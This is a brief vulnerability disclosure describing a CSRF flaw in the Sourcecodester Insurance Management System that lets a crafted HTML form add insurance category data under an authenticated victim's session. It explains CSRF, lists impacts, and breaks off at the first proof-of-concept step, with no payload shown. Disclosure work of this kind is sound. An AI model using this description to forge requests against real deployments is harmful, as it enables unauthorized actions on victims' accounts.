### CSRF Vulnerability in the Sourcecodester Insurance Management System PHP and MySQL #### Description Cross-Site Request Forgery (CSRF) is a type of web security vulnerability where an attacker tricks a user into performing actions on a web application where they are authenticated. Essentially, CSRF exploits the trust that a web application has in the user's browser. For example, if a user is logged into their bank account and visits a malicious website, that site might submit a request to transfer money from the user's account without their consent, leveraging the user's existing authentication session. In the Sourcecodester Insurance Management System application, an attacker can send an HTML form (CSRF proof of concept) to the victim. If the victim is authenticated, the attacker can add insurance category data from the victim's behalf. #### Impact 1. **Unauthorized Actions**: Attackers can perform actions on behalf of an authenticated user, such as changing account settings, making financial transactions, or any other actions that the user has the authority to perform. 2. **Data Corruption**: Malicious actions can corrupt or alter user data. 3. **Loss of Trust**: If users' accounts are exploited, it can lead to a loss of trust in the application and its security. 4. **Legal and Financial Repercussions**: For financial and personal data applications, CSRF can have legal and financial consequences for both users and service providers. #### Proof of Concept (POC) 1. Login into the application with admin account one in normal window and second in the Private window. 